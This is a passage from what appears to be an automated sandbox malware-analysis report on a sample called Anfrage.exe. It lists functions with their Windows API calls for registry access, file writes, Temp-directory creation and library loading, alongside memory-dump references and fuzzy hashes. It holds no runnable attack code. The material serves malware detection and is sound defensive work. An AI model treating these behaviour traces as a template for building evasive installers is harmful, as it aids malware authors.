                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3677997916-0
                                                                          • Opcode ID: d850bb980ad2883e227a71fb5280a52a3d81dc84fb8262d842fcbb69d7bdd2c1
                                                                          • Instruction ID: e91595cf43b51ebfb07aaa5ef395d3110d573e6c70d377c823b3106e64d9cd55
                                                                          • Opcode Fuzzy Hash: d850bb980ad2883e227a71fb5280a52a3d81dc84fb8262d842fcbb69d7bdd2c1
                                                                          • Instruction Fuzzy Hash: 9611E371A00205EFDB20CF60CA985AEBBB4AF10359F20443FE042B72C0D2B88A85DB19
                                                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: 17f8aef753e543b5ee650811f3a930ee6678dad556f6ee04a93732104315d6e9
                                                                          • Instruction ID: 86e07a789f87ce41f875dd809bfef8a2c44af10f02abad90d5e7e67c6ed0449b
                                                                          • Opcode Fuzzy Hash: 17f8aef753e543b5ee650811f3a930ee6678dad556f6ee04a93732104315d6e9
                                                                          • Instruction Fuzzy Hash: 6C01F4317242109BE7199B399D04B6A3698E710719F54823FF852F61F1D678DC038B4C
                                                                          Function 00402377 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,0000059F,00000000,00000022,00000000,?,?), ref: 00402C00
                                                                          • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402396
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040239F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CloseDeleteOpenValue
                                                                          • String ID:
                                                                          • API String ID: 849931509-0
                                                                          • Opcode ID: ff0e75e6dbc0e2437b530ccf3d824c87c8e4f35292bcf7b0d6f82daa0a276924
                                                                          • Instruction ID: e00662a738be89c3cfbff0ecf138b3afd2420e904d99b7d2952bcd9b842c0734
                                                                          • Opcode Fuzzy Hash: ff0e75e6dbc0e2437b530ccf3d824c87c8e4f35292bcf7b0d6f82daa0a276924
                                                                          • Instruction Fuzzy Hash: 39F0AF72A00111ABDB20BFA09B8EABE72B89B40354F24003BF241B71C0D9FD8D029769
                                                                          Function 00401A1E Relevance: 3.0, APIs: 2, Instructions: 30stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A31
                                                                          • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A44
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentExpandStringslstrcmp
                                                                          • String ID:
                                                                          • API String ID: 1938659011-0
                                                                          • Opcode ID: b5552f2be234a290874f3c0f94242e0d4c4f10651bf1eb4e94e930b3861cabfe
                                                                          • Instruction ID: 71b0070a6829c7cde886a334cb24b035409c21bf23b10b7f61276c16d8a13fe4
                                                                          • Opcode Fuzzy Hash: b5552f2be234a290874f3c0f94242e0d4c4f10651bf1eb4e94e930b3861cabfe
                                                                          • Instruction Fuzzy Hash: C4F08231705201EBCF20DF659E45A9B7FA8EF91354B10403BE145F6190D6788542DA6C
                                                                          Function 00401E25 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401E43
                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401E4E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnableShow
                                                                          • String ID:
                                                                          • API String ID: 1136574915-0
                                                                          • Opcode ID: cac30e9f311eb4ad2c25aa1c1ee820d5a828409d143bedf3ac931335164bf815
                                                                          • Instruction ID: 766ce69f8d9f29119b9d93d8ed06da5c6cb9de514c9912c491c81b05177acf23
                                                                          • Opcode Fuzzy Hash: cac30e9f311eb4ad2c25aa1c1ee820d5a828409d143bedf3ac931335164bf815
                                                                          • Instruction Fuzzy Hash: 40E01272B04211AFE714EBB5EA895AE7BB4EF40325B20403BE441F21D1DA7949419B5D
                                                                          Function 0040615C Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(?,?,?,0040320D,00000009), ref: 0040616E
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406189
                                                                            • Part of subcall function 004060EE: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406105
                                                                            • Part of subcall function 004060EE: wsprintfA.USER32 ref: 0040613E
                                                                            • Part of subcall function 004060EE: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406152
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                          • String ID:
                                                                          • API String ID: 2547128583-0
                                                                          • Opcode ID: 37fdef8a9e74f9e01c5d9cba486b55d61192e0831b538c4ba44b35669f5e3aa1
                                                                          • Instruction ID: fe74a3adc9e6e91e185966662b1f988274032fa32bcfbda24cecdfcd84f5f1f8
                                                                          • Opcode Fuzzy Hash: 37fdef8a9e74f9e01c5d9cba486b55d61192e0831b538c4ba44b35669f5e3aa1
                                                                          • Instruction Fuzzy Hash: 94E08632604211ABD6115A749E0493B63A89F84740302443EF556F6181DB38DC3296AD
                                                                          Function 00405A36 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesA.KERNELBASE(00000003,00402D3A,C:\Users\user\Desktop\Anfrage.exe,80000000,00000003), ref: 00405A3A
                                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A5C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: File$AttributesCreate
                                                                          • String ID:
                                                                          • API String ID: 415043291-0
                                                                          • Opcode ID: eb7c70162aaa2fbb41597db753891574ee1d02ab6b0bad872be1f899585ac646
                                                                          • Instruction ID: c63a2702068139c3e9e84e7d8e4b9ff8807d85cc1eea12f828f76e542108ca00
                                                                          • Opcode Fuzzy Hash: eb7c70162aaa2fbb41597db753891574ee1d02ab6b0bad872be1f899585ac646
                                                                          • Instruction Fuzzy Hash: 4ED09E31254301EFEF098F20DE16F2EBAA2EB84B01F11552CBA82950E0DA7158199B15
                                                                          Function 0040551F Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateDirectoryA.KERNELBASE(?,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 00405525
                                                                          • GetLastError.KERNEL32 ref: 00405533
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1375471231-0
                                                                          • Opcode ID: 6906a218f2e8c60edb1d49339bec002b269bb684b810150c6462e9a7ab2278e9
                                                                          • Instruction ID: 6753ad635049e665ee29f65e98c6a641fb529068fc3dcc6b05b24214ffa30412
                                                                          • Opcode Fuzzy Hash: 6906a218f2e8c60edb1d49339bec002b269bb684b810150c6462e9a7ab2278e9
                                                                          • Instruction Fuzzy Hash: 2FC04C70255901EBDB515F20AF087177965AB60781F564839618AE10E4DA748415D92D
                                                                          Function 004025D7 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: wsprintf
                                                                          • String ID:
                                                                          • API String ID: 2111968516-0
                                                                          • Opcode ID: 49b3759869228e343b488f69512dd5783725357fe23cd51fc775af813734beff
                                                                          • Instruction ID: 05ba47fdecc3ea63c4ababd7ecb476dc6fb20db578e5a9eb58a554c529b3a997
                                                                          • Opcode Fuzzy Hash: 49b3759869228e343b488f69512dd5783725357fe23cd51fc775af813734beff
                                                                          • Instruction Fuzzy Hash: 6021C970D0429AFADF218B9885486AEBF749F11314F1445BFE894B63D1C1BE8A81CF19
                                                                          Function 0040166A Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 00401685
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: FileMove
                                                                          • String ID:
                                                                          • API String ID: 3562171763-0
                                                                          • Opcode ID: 959bd50837eb92415fecec8519fb41a0f39fb6080f95b2b2d2609fca4733927e
                                                                          • Instruction ID: af85bf01cb9a50de78f0d69bccb7876c1bca0e6a55c196669191a5ce7f6391a1
                                                                          • Opcode Fuzzy Hash: 959bd50837eb92415fecec8519fb41a0f39fb6080f95b2b2d2609fca4733927e
                                                                          • Instruction Fuzzy Hash: E6F09031B08225A3DB20B7B64F0DD5F11649B82368B34027BF111B21D1DABD860296AE
                                                                          Function 00402695 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004026B3
                                                                            • Part of subcall function 00405D21: wsprintfA.USER32 ref: 00405D2E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: FilePointerwsprintf
                                                                          • String ID:
                                                                          • API String ID: 327478801-0
                                                                          • Opcode ID: 4841840ad3e59c26d6a825385cdbce8c8f4545ec6429af0b04c71902af0b9ea9
                                                                          • Instruction ID: 70d0227debc7a37a578d7891b0457e087c522133a583d4ed7425beec3b860107
                                                                          • Opcode Fuzzy Hash: 4841840ad3e59c26d6a825385cdbce8c8f4545ec6429af0b04c71902af0b9ea9
                                                                          • Instruction Fuzzy Hash: 40E012B1B04119ABD701EB95AE898BF7BA9DF50329F10843BF141F10D1C67E49429B2D
                                                                          Function 004022F2 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040232B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfileStringWrite
                                                                          • String ID:
                                                                          • API String ID: 390214022-0
                                                                          • Opcode ID: 0c403ca9e670ca7d91bfe0ece00723349c72c8e04d61ed265d5033cb5576c277
                                                                          • Instruction ID: 835d7e161f894c1f3c63ad3b4a4a0fef325150ad5848be7be1b76146568c1c9e
                                                                          • Opcode Fuzzy Hash: 0c403ca9e670ca7d91bfe0ece00723349c72c8e04d61ed265d5033cb5576c277
                                                                          • Instruction Fuzzy Hash: 9EE04F31B001246BD7307AB10F8E97F10999BC4304B39153EBA01B62C6EDBC4C414AB9
                                                                          Function 0040171F Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: PathSearch
                                                                          • String ID:
                                                                          • API String ID: 2203818243-0
                                                                          • Opcode ID: b870edbfbee029a9ad95b8ba954cad8e8ca6e667ef8ccb932940172cb277afcb
                                                                          • Instruction ID: ffb32fe50564557a3c315a30f6fc07dc6475dfcf7bd80787db6a7ea0a2c14a15
                                                                          • Opcode Fuzzy Hash: b870edbfbee029a9ad95b8ba954cad8e8ca6e667ef8ccb932940172cb277afcb
                                                                          • Instruction Fuzzy Hash: B2E020B1304111ABD710DF54DE48EAB3B58DF10368F30413AF151F60C0D5FA5945A738
                                                                          Function 00402BD8 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegOpenKeyExA.KERNELBASE(00000000,0000059F,00000000,00000022,00000000,?,?), ref: 00402C00
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Open
                                                                          • String ID:
                                                                          • API String ID: 71445658-0
                                                                          • Opcode ID: 72d4a8390eeea65c1ae52196c94098a904bafdf16ab8cb809bd630a83faab224
                                                                          • Instruction ID: 602783241e3b5571dba8f65d987ce24de14800ae8f8c1c2312d958f7963b7942
                                                                          • Opcode Fuzzy Hash: 72d4a8390eeea65c1ae52196c94098a904bafdf16ab8cb809bd630a83faab224
                                                                          • Instruction Fuzzy Hash: 4EE04F76250108BADB00EFA4EE46F9537ECE744700F008435B608E61A1C674E5408B68
                                                                          Function 00405ADD Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040310E,00000000,00415420,000000FF,00415420,000000FF,000000FF,00000004,00000000), ref: 00405AF1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
